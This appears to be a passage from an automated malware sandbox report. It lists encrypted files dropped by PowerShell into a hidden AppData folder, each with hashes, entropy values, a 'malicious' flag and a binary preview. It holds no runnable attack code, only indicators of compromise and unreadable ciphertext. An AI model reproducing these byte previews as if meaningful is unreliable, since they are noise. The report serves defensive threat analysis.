                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\okefTKFcPy.FKBGwpZmnRYoSeJz
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):87533
                                                                                            Entropy (8bit):7.998058025191271
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:waYtFlF8N76Y/FPV4YTJCbQTXR5BkuUfWIZKB/6ul9Ey/:wjtFGR/JFU6qFfVZKR6+u4
                                                                                            MD5:5B389E1EEB35067ED1997DD8C0A8192A
                                                                                            SHA1:D16F49D820FD75D6DDE0FD8734E74869CFFD5212
                                                                                            SHA-256:C6D97FC753C333F779D76429B44470810AD0BD909F70F0DECC95CDBCDAD36DEC
                                                                                            SHA-512:76C18EEC2CD6C2EC880AFFC87C9BD8EBD88DD3555883A7189465075FA9C61CDFBE603825B822ACFA1DDBD0DA75CC1410D81688E8EDF64318AB6AAE4279502EC7
                                                                                            Malicious:true
                                                                                            Preview: .JX.....l3..2VmP.#.m..../R%..<.O. :G....t*..3...7.WGZN:.o.kCZ..5.qL..,e.4.........T....'#,V.`~"....v.n..&..D.rWwY.....y.s.8....r..]O.....Fd.Z.>..... ...K...5..R.2+...e..k...`...}...R7...m..a.c.v'.!...7...RY..s5..1....<...I..A0p......f.(....K2.^G......."..S....I."B..j.s7<a...L.....`..k@.1w7.R.<.76..\.XH.#.w...._2H.N.B*.B.....HNH.......<H;.*.p..Rz...~/..R....)..7..wW..z..5...`..\..d....E;.vkE9.'>........&..E..U+M.\f.[..4.o...[4."...W..j...3...!?..V.g..j.:.<T.c....B...L.6..s40..m....ZV..e..L9..C.......1.....i.......p.o.\..Mz..*..!...A...[..e...N8|......G.3#....y...D/Bv.;.?.....L....%.Btu.?{.W.n.\.L.......>..T.4zg.....zE..-h..E...Q.OLV...7...":.Qx......%.E.d..T...n......2\.......m:C*Da0.>Xt.=.?....o..P../..z....^..].t.e...R.}$...X.pk..`i.{}.V.R...' . Co..U7.G.d..h9\6......k+*..U.7.O(c#..oDjrA..d..0..$..h.r.nLg..k-..@.8.;...g..8.V4$!...J....a"...UO.r....[S.".Z..2.b...S.....j..y.....o,..|....'..,....;.r.p..+.N.s.q...nM1..\._. >...W6.....P..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\pWNJaOkLEPTitoZQxh.dhekgZDquCEOGo
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):63632
                                                                                            Entropy (8bit):7.996914160272356
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:cusrXUNObQ8K18B6IDZcB4yOxpnaN2E9PM:cvzUNe9X6IDZcB49a8EVM
                                                                                            MD5:FD3DEB96DFC944584880EA7C71287D51
                                                                                            SHA1:CBDA1E0E2B60967183AF5331575F88FC0460C3E0
                                                                                            SHA-256:20729B3FEAC24894C2B500DC0D1306E876E75957CB852DA811E8D6C0358ECF50
                                                                                            SHA-512:0F4D2DE68032E3AECCD6505991B048195BDE34DF32FCF4F3189624CF76A1BD2A812A04DC6F3AD3428148507E845078EE63FF210B9D9B14BEAF362B223588C0E3
                                                                                            Malicious:true
                                                                                            Preview: x.0S|........w........+]...._A..K............R..t.m'....o.......?....7.....Di.g..#..:....A.."nD.....~}.N....U.4LS....O>9&.W.Z.~;.`.....nk.O'..k~.p.R{v1.MqX.-.=&.....X8IuZ.W..N#|....+.F......@.B(!..v..8..!..5"4.T.S/.......b.....;*.X4.qN.uUtX.}.....G.7....z....?........xLqlp..g-.&.?.V.n........t..@M:...=3U.........C;.;.....W}.|>...........{....^0.......]j../..S.M....."..."P...FK.........r.)#'0e..Q...r...pU,..K......!......).......s2..K........030.I..dA....@...d.1v.7.....w..1.T..[.f..y.....M..YGV.+.j._.Q......0....=....f..,..dY...%..Jy..l)Qp........_...r..!L.........S=ef.~^I.K|..E.^...hc...I....%7..X"C...a......e.W.z..5`...~7%D`........f156...e....h.. K.....@..eJ.z...+W.$..`W.C9..8.x..#......p..9......u.d.dY..._......].a.F;.m..."..1.!.W=(..l~........h5g..(..;G[f...`...Z.hu.{.b...h.bK.n.c.E....yR....N.|....<<....E...|cm7.o..y...n.^T..N.....D...X4d[N.7.D2...c.BacJ.-u#[9.....gIGE....|s.....H,m.f..*.A...f8.Q1H.....v.:x.j<..O...>
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\pWvkATwEHSh.AqsJwQazvZIXiBC
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):67800
                                                                                            Entropy (8bit):7.996465274236661
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:GOL6lx8RxW5mrJ8O2774N8zcNTo970N7o/15pTB:jL6oOG2c8uNsdR
                                                                                            MD5:2A453F609C83DA23DB9538CC46244912
                                                                                            SHA1:1C381D330DEE719925B8210DD75199BAA4A3AC14
                                                                                            SHA-256:3F8AE3481C7A8FF0A4D68A5A181BA2343ED5AB74B7B85AB9CB475BBD3D84D074
                                                                                            SHA-512:D6570D0B2E344110F5AA30648C7E207C4FC3C1EE8BB4C627E2E17F0E32E1639C2AC657533A919AED7CB1E7E127A3F55AF33ADA57072F29B5A4E7E53C46DE9944
                                                                                            Malicious:true
                                                                                            Preview: 3knp%.%C.Co3.._..t...8..{h...........S....../.H.c.......}.u.y.kM. .!.z...80?..+f.+.J....3..J.W.m....M.M..J..^.ZI>.`.....B...R..D.......goC.:.X...B..4......I.......$...p.y..,....R#L......1..K e.l.b....\. }....G...b3...l.}.}Y.^.S5a.7..}5.;yRmN......v."Tj.&.#_o.|"v.y........Ny..r....=.........+.u9.n...a<..(Lp.&..c.....[.Ug.#.a.dG..&..A..<.u.3...Aq..<....<...<....5)....\.Z%.)#........u.5.Mt...p.<.9..,x.Y.0.u...R.#`."....I.v....m.A....B.]......8j.....1.[.iN..*..on/....0iV^..q..v...+yJ...{.a~....j.......l'.q.J..S.B.;..D.;...6.Cr..f.*.l.tI...:...d..u.N..u..E6....uMw(!...(c......oX.o...VX.....-.+.|s;....u&J(u..e.[@..5o..5].{.5..<.2.bD..[.-.......G.iD.F.......Cm..%.IC.....(c.H@R.+.d.b.B..!.:.....R.__..*.Xo.?...P4.]...{....0..O.f....7.....8..Ty.I...$9.....d>.9..Y....U..M..!....."Oz...p,..}..]...L6...r...l.........I'..2W...@.>.\[..%.\.i.....Z..1.l...y.....,.]z.v..d..1....R.e.l.u8YK.Z..JS.3.g4..o%.:"gL.-.Y..W.BC*.T.I.q.T.....ij.6
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\pXLuVbZASaMlEkmB.HvyDrojqUXiw
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):151836
                                                                                            Entropy (8bit):7.9987254853445275
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:a7nmACH9ncdkKseaaP29XJ8mPNvxYSyE9w2YmZJ1dgimetiIE7QxF/:a7nmH2kKraS2wmP5x5C2Ym/1mh/Yp
                                                                                            MD5:AB8AEEFC7D8A15CBAF3918ACA135245A
                                                                                            SHA1:CA2D0E80557421E3636602131CD4890DB51BEBD8
                                                                                            SHA-256:2B8AEE439B50188E555F26EDEA13394DBD51B7C80FDFFB9437D7EA2C755CBA36
                                                                                            SHA-512:DA52131DA0ADE5F7D4100D53019571645F9A13D136C8EA9A5173AFD6D692DEE5EE5AC40A48C294299D9CB78AF34162F087AF9FA47515D46461623A53D9EBC692
                                                                                            Malicious:true
                                                                                            Preview: ..........!`1S;.n.b.{. j1.9...[..6..8..O.U.m<........#..r......*..5|.>..%....af....7 ..".9..p.|bH.d ...t....xZ...CW....`.b.........Sz..L'pW-Qc4xj.cUq.M...7....l.x<P..[..Y..29.P|J..,...vH..mgf..w..(.........\7.au..@=\k....P.$#p..XTlH.}....x...}..9.....[.b...`.#Y...s.T.\.q.3.D.......GF..q)DPU..........V.(.....p...McY,....,..]E../....N0..hd|..=.........CW*|KW.*.Ap..m.(..efovX\%I..H.j..[.#....Q....'CpZ...... %.D.........t=+....I!P.......Q...K.p....^~.............K...=...~...7......B....E...W.~.p..!...4R|....U_.2.s..<.Z...3y........<.....C.z`T.....K..(Dv...9h..Z2o..l+y...F].......<?..,......."x.p,W...ld..AqB......0.....<.tW..."p...F.u..E,.....c-G..rS@.0....XT.\\G..]....a......P;.@k.7..qQ..P........X...S8.......Gs...v...?..I|E&L..J..myQ......LLE>v....D:..e.....d..b.v.....AQ.=.~.....9y...........F......$e.H.:...H4M*f.!..;..#..7.r.r.<..5&..;...$s...,.q.C.......s@@...].?1E.}C....t?RE.....a._.2.g...ag.....,..\...5.-.?....e.'.v..LA..x..X...3.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\phavEfQLqZxUOAcgMu.cBsHAFSbqxwgkUGOuYo
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):177229
                                                                                            Entropy (8bit):7.998914513642588
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:kCTZOLSrNWpZFLbvDN+4iV7yWfOKIkPnJbn33UQO29KYD03Rlm:Jw0I3BDB+NlG10nJbnUQncYgB4
                                                                                            MD5:F2A74DD0E19F719EC57AC16265D7472A
                                                                                            SHA1:88453B72A8F25A32597172B9DDAC1EA19BFC29AE
                                                                                            SHA-256:60EFF54D252F7B96F8A7AEE7725478C8CEEED76379DE392D2294B5A333BF2CE6
                                                                                            SHA-512:CF0D24DD3781075D8D8C7FF58C7EDFF3AC6B7135B3AEE0D6D2B1A735AE20931AB7911A245D8802D7EE15F00C422B95EA27A77C2B5ACF25BE237FDBDF0B81FADC
                                                                                            Malicious:true
                                                                                            Preview: ...\s.A1b.=...|.J...Ke0T..Xa.....W.g...O.E!#....Wd..gu.x........"..m~8.c.M..n.%....Gz.d.. ...s.i..7.,)mQ'......rz.........K_t.O........S......C^....*-..b"..e..E}...{..Y5..O.....v.s..m^r...J.0.~..7...)O.....x..6Z...C..........[yf....$....+.....fu....z..l....{#...i...D..i..b.+..[`.r....'+.....n...."?j$....8}t...-..mb.,......;..$...>...{...-........cr&.UD...ZYc@..v.1.j.~.k...t.%"...g..i6....T....;6......m.+.8.]v....w..,.....M.........a.\.Io..U#..M...........bC...U...';..........\..2.6.......,..D...7.../....4...s].o.......Xqd....... ...."t.TD:Tf^.&.v2..n..Y17... .{...E..."Ol.7.L....P.B.GZqw.=-.[$...t..z.}....I.."..+8.qD.?......6..}...v.:E..-..Z.LSX..3/..n4.*.2.B.U/...s|+.G..<...Z...M.7gB>.U.X....\-Y.-v...n...+ .|...J.s4m...68...C.h9.....JR.)..6(..F./..1..7.U].. .Y.S,U.).r..nZ....O}.o0..F......._......-.....iT8...E_..(...r......."...^P.Y......B.O...x..~Uh2.l1[........J.....M...SH.m......&.z..s0w.i...&.6............6...$..h...*._.NG..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\qTrZObDhSCYGyzc.EALtUnXeoquvzOQH
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):61774
                                                                                            Entropy (8bit):7.997185490808133
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:GR2u6/6PIDZac7cxBvJkA78npyyfi7Lh080RDGtL:GQuGyiacoxTdYnQyfyLGdKx
                                                                                            MD5:15C0DF3486B0C799C1CCB39D77FD3F14
                                                                                            SHA1:248E6DE152B7CB36475C2509EFF105F976B070E0
                                                                                            SHA-256:C1EE8054F627D40B4304BD4B5A43CF87715CDB77931D445232BF9BB13439EF6E
                                                                                            SHA-512:A88091E56BC93DBF89D72EFEA8052F2A490F94FAFF014418781F32F7CDEBCA53D8100863338941A3B393229888038FFF99B4E59B40A1DA270A10215EB29FD175
                                                                                            Malicious:true
                                                                                            Preview: c.?....*..S.R.<...+..J.T.[.c.R..lB..N. l<.j.V.x6ADOP.....d...n1...F..D..e|.4...v"....h.....Y....hH..x..[]..f.aL|......Z*.+.##6w}{.q..+.O..,...2......v.M...:.o.t%3.....L...p...F.@....=.1.....E........!.^....../..j|Z..D....A*?.l2.'\..!>_.l..4..]j.MY...S....?.B......r9|.+h..H...y...R..F.......p..[.....L.`w@..jO#...._...R.M....q:i..|.Z..X..nSt/...]..s..V...f|.u/...<.....H...q.Y...+....S.T_4..Q>m[@{.6bk.+..r......a.,..y..D.l&...}i./....j...}.'R..:@.:..`.&^.....Ys/YY.D`.9a..(.g.n.k...$[..n..)..#...^@.....4I.d..."aL.ES5....kc7.j..o!..v..,;.._5w.O..`n..`.J.V.iq....v..h...E.\uzd./.....^..+.....3....q.....}s(.t.:`...$..sH.G.....;.I..8@.<.W....._.5_....Q'D......N{....{C..h...Y.2S.(.A....).As.......0.../......a..&..2P}...p.\'......e.....lf..W....}1k..:....4{..n....)..34H.....1]-=.oPJN^b.....f.yD......6D.!...y.M...U.`..j.<k.y.Ro..\]6.r...<^.J|.?.|.${.b.....)o.).[{.a_.;.ah.z{z5.KYk.U...N|..[z!vP..!.......Q..9..v....b..F1...:..*...b.l...%..n..}.0...E.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\qptaygGDHOvhK.YSKJRLiycNZuhvbWx
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):131957
                                                                                            Entropy (8bit):7.998586289165588
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:x/539mQWVfhqNDVaBlVId87qvLAXutzFYVaFh5T:xxilhqaHm87YsumaFz
                                                                                            MD5:471DB3ADA6619C5315BF3CB8F6B4B52B
                                                                                            SHA1:43DE47058184912163052BB7529651213C971BB1
                                                                                            SHA-256:CF795AC3005E10176DBE900C398FF1FA51CE9571FE6EDB16BF0D68552923B9C7
                                                                                            SHA-512:0B94395682A269DCE41E6A1A2306670F7FEA494FDC2BC268AAFFDA7D2DE1404C6BC137162D6B0D61B7B0C3183D669EF971CC81813C73819AC27A688FB0C2D5BE
                                                                                            Malicious:true
                                                                                            Preview: ...J4...K.c8N..$..f...c..'.a.).(p....-*rMB.`..G.~-.k.....u~.2.....N....8V:...._....mA....i+........{g.P.....U...y...L.c]..... .....S`Z.......D.3...<....#,M."C..yr.1.......S...FX!!..U../3.<q....rwoW/C\..?.....].!.....fGQ.uzG..?.1G.....S.D.&.}..u05U.........v.VH..0.....!i*.............!....>h'U5X.Z..u.....o...g*y....`./$.....C.+S.^P..I`@.~.A...l..>...\....[-+X|.[.)=..]........U...:i....t&...0./.u..!...a......n.15....x....Y..%.Gi~H.H....3...*..|..yCQ. XM...T%.K.yn..E......zx...;..'.).5y(?5.:...3m.w.[h..z..?9..4..|.E=...n...#.D. y<.f.^..8:...X6.(^.2..T....S."w.w...3.5....-..@.".f....m...._..k%..B!.m.(....&....0Q...m.....;3..u.6....4..i^T...,s...p..9y........u.. ....5..S}.....:.<l.R.f...r..nsr]R...T..%..4."...8?.....oa....D-.nV..Cw.5,.O..o...:3S.....d.v.u..+....C.o.pf...!..&..^.."_....}......x..)n.D..^.O..........T.V..^...5...j`.^.`....2..=...k..kG..d..6..._.Y.P...3.%.....r ....]M......pru..yD..NQ."..~F.n.|...c......=..q..O.An.)..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\qyruEKPUAcSLR.EFYWjJiwvkycQfogCs
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186512
                                                                                            Entropy (8bit):7.99893112438084
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:Nbbefa1yGy81mzkFhvAnmABSINDa5ksLs6Np0XZcdynWEBQA9Uf4gGsuLAN:Nbbv4zkFh4nmABD9cRT02dM925GsuG
                                                                                            MD5:EBCA54C6D1A887021F18E1A04B9961A8
                                                                                            SHA1:C0E90CAA22F28F7F0FAA40478F30EEC6EE55A0E7
                                                                                            SHA-256:3E30401DD208CEE2DBAF9E1AEC8BD5D9E8FF0783FEC0A0F1CDD5DB68DFD7BB06
                                                                                            SHA-512:C500019CEAF9F80FFBDDBDA55815E008B99A446C548ECA617F91C5517090F425F196827C93C87F8306319F6F3CE4A1F1DF599EE3CAB5B943FF34E8D6F93F61DA
                                                                                            Malicious:true
                                                                                            Preview: ..t9........K..1....on....:"4..6..ws45.......}2p..)D..=.I.y..Q.b!U.....e....I......~._5d..,a...c..i.sS..U.>.......U.|.]...96..^{.{RQPC.H...s.gn.,......A.s..u...u='ks.vZ....e&......l.n..u...\.....?.).hh.....~.....D.[..d..[Nt..N(Gh.p.3k.[.3.P#...~..Q.4.........7s.k.....^.0TU7P..L{4..h.&.3T.5.......V.'6.6k.c...WB.e.....W.-..<.J.@....\.2tQS.m......T:`.po..../L...Yz....r......@di...l.l..S..D.:..59c.J...=.......nC.zw.T7..Xe.W.......=.....Z.Cz!.{%..Vo...oQ.....S.).\cc..~8.[...t... ..1./..d...l<.IP\o.....6..gZf3....Vs..,..`.w.......|.*.....ls....m@Q.X.B.+..`.Ghk......H....""b.i(B..Bs.....Nt.?..3./.[n..[..e.3..^........P<Tv..D">/a9$.p...t...b.W..?I..-t.1...(yC....:.....4....j.q....]...>.H.K.K.^?...!...GtqWI{b..`..M..?.0n..B..{+..b..b{..;l..0......Qk..$z..........u...O......9.C.2.=...{.....w.K..2....c..,z.+>.\....7..*.+....A.~....A_gm.c{E.|.zZ..|h....l.\...w3{..Hb]a|...M..dP................IP..T...6.....h.`.v....5o.Qy..O@e...6/.m.15..../.........rVs..W
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\rwyFtKsoXUNMILDWhJv.OsZECjYcXVLyS
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):161665
                                                                                            Entropy (8bit):7.999061028734399
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:3mCEVnM7ORR/VOCfcOX+yyZFVIJjrgHFCOtGYjstuz79+s+3BPaZfFJBb:3mCqnM7S8CfcOX+/ZjcjrqFrsk79PwhI
                                                                                            MD5:7F6287500EDA5CD0A2FF4C59D3759908
                                                                                            SHA1:98B4978313ED347A970DB00F7DD60368680CB9F6
                                                                                            SHA-256:08848EE839B5E3EAB34780727AB47E70609AE29A28111209FB889E0D9F1C6902
                                                                                            SHA-512:AC68F3932B1770AC81022074A79EA0DC6B77ADE152B4FC0C3E30938ED6AF977BE2DF4CBA93B52EA8C56B033A809E1149641CEAB1A59C97D0323DB887FB31BA97
                                                                                            Malicious:true
                                                                                            Preview: ..g`.qc...g'.a......{.W'.o............&..-.-k:..zh}.we.95.n...b...$d.Q.w..)Q...z.t....yw.t..3.4.7...<P(..X......x.Q.......^p[[]..n.=.L..0......c.....y.kPkK...4y....:3...eB.[......yWs!.8.W.f_GN+...^R.b.M...e.hX..4n.2Z...M..R+...T....3c..W........+.+mx4........z`....d(....U.].x....4.10....f.{GVtG......i.r.zfx..!E..../....a..x....?..~c...AJ..(.l5/.....'.../..!c...C.N./6...Uq..jS.Ib....Ae.q.?...@2.x.h...... j7._.......1.a.....oRnR.....V(... .n..'F.".G.....a.....5.#2.W.A.f..^{....0.....rl,..R...&.N.d..A....].b....a...@.*+..g.y8.8.V.ej..9......?..=3.0....qRT8PR$.*...P.e..>...;.Zv.;...I.D..:...T.j...F.KA...6W....."....*N../|.O.7.6...#.6...>.=..H.x .I.`f..u.f.#2]!.d..&T:H..o.e..g]o=...WSZ*#\.....%.,....[.EC.g....vV..g..1.m..j...:.t..7.....}:.I...0....t0..$...:e.N....uYv.ua3.Q...U.u.v#kJ.sx<..B.....k.`k.........l.1.do.H..9T.._.V...Bm.8Z#....(.M..#.Z..^.U.d.Z.{...J...}@.D.`..YNHzU3C..x....5.%a.......r.SJ..Dn.h.HMx...c.....;..dKq{.....-..#..V ....0...
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\soQwPHCEaWcNnAgRKu.GUhPcAHkzNRoMwdvV
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):190459
                                                                                            Entropy (8bit):7.998921520940541
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:atgwlRC0j3bI/ASPa2YY1iFLWoKf+IE3DAbAckwVov5MuF54jfpvUna/quQyZGB7:MgMR/jLI/AbYItWoi+pJckQ+TYjfNUaa
                                                                                            MD5:715726DD32C1CE7E37707C523C99CD24
                                                                                            SHA1:07B9B9C119515CF1BDFA21B0783C2C2CA69583F3
                                                                                            SHA-256:9BC0EC002814F4A3A3385817BDB8DBC6617D27882B3C85B8A7D2771FF4D052F7
                                                                                            SHA-512:B059239701B4F23BD42395D137DBC01B1F1095131C6E42F55500A710D1DBC834821294CC2FD08B48E1D74E770E270487D5F080F4B1349425D770520B083E7A58
                                                                                            Malicious:true
                                                                                            Preview: ..<| a...Ni....)...n.`....w.'..3..Y@a...3......K]#.'../...j.A..].!.4.1.{q.,.^..s..a..<...dG.X...q.%r.n..v8e......._<..4.....@..&..0...e......[.. .4p.w._m...6H.a.L.=..N..%...j.: ...I..9k......L..W[..*R.Z.=(..?.o}...].;|.._.W4[...N...f........W=.y...o.i........N.Fb...{L6...t..e.Y..=..ys......S....r...8......P....Uz..D.?7.9.!.>koT.....k.Y.#.......2..}n..].~4V..b.aQu.\.....V.NH.!9..p..[..[%.w....pL k.0..Rw)..0.L.....M...X.$..q.$...cZ..].2..+9E........i7....../.R.b.H...T..X.-...h&....M,.....yy..I...^.*j<........O..3....'j...n..TA........;..#?..*p.Vb..61).N.3.UD.ZID~..2.K.OF..0Cm......X..r....w\s..+%$.G#..h..m..Z.P7p&#...B..hJ..]|......m:.T.Cd.H.;t...d..u...E`.I...<.I...zk..H........a.x..........}........-(....&..'1J....wi.{2........h.K.K...pa....!@FQo......'.P...K.W.....b..a.32\m.Wtl.\.....\.Be,K.k..;...._PZy.Y.w.y...g.O..;..=5O=...{...TIZ%......l.p).....!..;......K.;.....8..{..)V.!..b.H.2-N.v..) .5...%zd....)....ma&U.a.t.._....Y./!..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\tQjgMbNFVwAfEpvBK.NrIzOdGfyRFuiWD
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):123900
                                                                                            Entropy (8bit):7.998446148715915
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:Pt+9u1S5y+XugXqi9GtYt0YbgRKQuLygIdxau2UE0zKSal+5:PC2+XHYu0YbRhegqxau2zX5lQ
                                                                                            MD5:5AC304DAF5E06EC6E9DF4684A1D046FB
                                                                                            SHA1:9DA0AFA1A8ABE48F3A6A0DE8F26F2AA40502A0CA
                                                                                            SHA-256:7521E3E5031DDA949E168C2994F02B5B4D969CC251885373DABF8943BF20EB7B
                                                                                            SHA-512:1045887B247005169BEF504F7045762D1E38B539653ACBA9F3D409E3DCC7C0841FF7C4A7301A5A99848FA45F30A866590E2B00D2E79A6F79B13621972B4F4A8F
                                                                                            Malicious:true
                                                                                            Preview: >1.*|o.kB.z..t...m#.........X.D..=.w.......q......s..?..`[.R.F6..7......vz..3..._.r......%.V.;......./.....R.G....e._8\d.0.. .V\..J...CI.t8.....c.hZ.T..PO.....3r....G(.....>..V..V...y.q[.D..R.]...$.`.>.i.^.N..84.Ep..B..K.*h.S50.........*..J...M..4../..............@..mMC....H{Xj.q$..-.G..,....*v?t..5......[>..co!u...w.d6....`.8.......J.(O........`7..v...8#5.......L.N..].pz...f_.r.....x{..........]a.5.N.>W.......Q......i-...y..4..D...7.!.........Y...<..Dq....-..X...=..._...?g..yfM-...LC....D.W.A....sK........zZJ.+....n...h.qL%...N..xZ[./.O.%...,b+..i..../..hpLf...I..8G?.~.Rn.E...f82I(..,.......Jn.e)5.:1a..]~u.... k..T.9...ko.a......L.zCk...i..g4u..X..w.I.U.Q#.....r.^2..?..K...:E..3....j$M..2M~-..h.........7...]!.....[...LQ..z]............[...+.j..... ....22_..D.NP...6.W8.).8|.....3rG..}....0.w.d......c.A..L$..O-..=..]9X2.......F\..K..n.rL.@...&.;`zh...v%Hx/...A../O1...T..&.(..u|..^<0/..).W..../..\]w.a..4.l...... 8.8.?&9?~*.Fr.-'..4
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\txADckwQGJHK.IxuVkzFSstYXMP
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):70375
                                                                                            Entropy (8bit):7.997466023020883
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:Cai+z0SpVJNjSOYq62H3w7z8SnrsrGgWIiElw8N:Cai+0SpVJNeORH8oSrsrboMN
                                                                                            MD5:C1375E7A0CD1E68D836A90CA8CE0F2F1
                                                                                            SHA1:D8846440178CD8736400B948D94571A1ACFF6957
                                                                                            SHA-256:6416B324A8D46BA5B965DC8215CF7CDC4CF397A1F54F29B3B67450051810B2EB
                                                                                            SHA-512:D0A391F25A9A3D289C37A7A0F511DE6BB512D044CDC7C1D75BF31703C773532CED6009871119D11634D8B998C12F57382C683CF7A5FB0468911A4A31BCF6C62F
                                                                                            Malicious:true
                                                                                            Preview: ..A...n...h..cxa.4i..O....Dr\.N...U ...4....~.......H..`.)..T.89J.m..W..5.o7.I...?.O....ipy.....WV.B.....g.h.D..#.......d9'U.....@...bQ;.\...+.'.P..,.k.k{.....).SD....yE.....2.?|..j.~*Q.J~;..Q4.q+..Q..o...v.....o8ak./..7lV5..........|a(u..._O.@9.&<"...8A._Q.b4.n.&v)......)j..FA.I..a....;..$.bo..A......iH$..4...O.q@.Uh.R.C.|....}wsd.<.o....5...H....`?.:...*&.........I..7..4.$7..7.).$.....h.z.1~....s..mR.tl...~a%..l...g..$.....f.}C..*.?|o..t....3.......$HK...]y".....A..a9..1..-.X....k7.......R.4..7..@R.>.^z7...T.x.J.`.,......B.!.....p.('.r......@..p,..-~/..8.f.1....47o.D.Ll.c....R.y.e5@.\....q6..J..8..V.2.2h.6.]..M.~.._..)|....l$..$..t...}....D...PX.M.].........8..........{...&...,......Pm...S...`..>..2.u.`I.....S`..@USOe...L..>....^e.FK8q.v.Y...r.S..`}.).............p....PF.%q.=.......Q%.g..J.........|......)...b.....h....).s.....&=...|.#.. ...4.....(......P).....FK.^..W....?..8...g.%.l.8....P..OQ ..I1..;.].^k....".i......3...Q.k..".
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\uDCtRUzOGL.UwWJgYkjAFebtZL
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):173218
                                                                                            Entropy (8bit):7.999133593087592
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:AcOI1xlvduqFp/A58KrEU2cyUad7MuDwUUu8xghm5z1K4w/kwp9BGiyy:AxI1jvjCnwU2NUad4awUf8im5JD0kwnn
                                                                                            MD5:B0A5D13782A43D5CCD2E590C585172A2
                                                                                            SHA1:1733E399847BA3BA3019C89F8A65B3200CC01474
                                                                                            SHA-256:395346AC76959347E889B59D0DE641C597B1EA4331550A28A15897E16DC40B2B
                                                                                            SHA-512:569FBAF96577A5B9DA9306CA8894E14B7F63CEA27C2B08F295135A59BABAF9C578BBFB98DA4A7AD305C0CF7C99ECAE63ED4EE78A78456AEC63F400C3911FDC4D
                                                                                            Malicious:true
                                                                                            Preview: 3..u..j...2~_.. .OYs"g....1W.........y..x.?.;....\.9.$3...8ee.. v.....vz.M(1....G.J...c...o*...C...v.M?............I_.D...../.x...).......a1..<.]@D.YX.2FzX.....r..d.......Z......<....6...5.....L==~aXj.....f..._.B.U-.-]TX...x...l|=...M..~,.2]..r...P....7.. ...Bo!Nq..g...(z]fr.....,9......}nX.D.<.-....$.}..Fs9..C....p...53...k..&.EA.7..T..U.|...m....c-R.........,.[..v.Pi$.E/..-.a.3 ..E.c........Q...=Y...q.k.....pVW..lV=. ..}][>.\&[.#S.%.}.1........Cz.)9.H..#,..o3L.....zo...L.....Q....i...,M{W...8T..\...[....R.<......B]I..8.'f...JO,Y.F|.H..uq...8.....9.@#..~0...........\$..8A-..FY., .`".S._T[i..5!.S.&.1..+.~^Pq....-...w0n.......P3<.C.4.E.x..:...e./.[......QD...|..L!O...RA.L.f.o. ..8o...x.4Q..=..Y...,.A.....,,.c....'.j../.>..P.FY.sX>..''...%..E..|.{p.M.....p.....t...s.Q&{..n.B.........M.G."S...~U....S&....kc.KJ..".U..l%..KY.l..4....z.{....Q...^...)..=..J.JQ....AFX.......C..X{a..ig.../.1.j.=#.H.@..bN..p.OY......#..*.x..k.2.u.r
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\uKhTXaEClgGUWFHeSBJ.QqbgwODAcirejphRKoJ
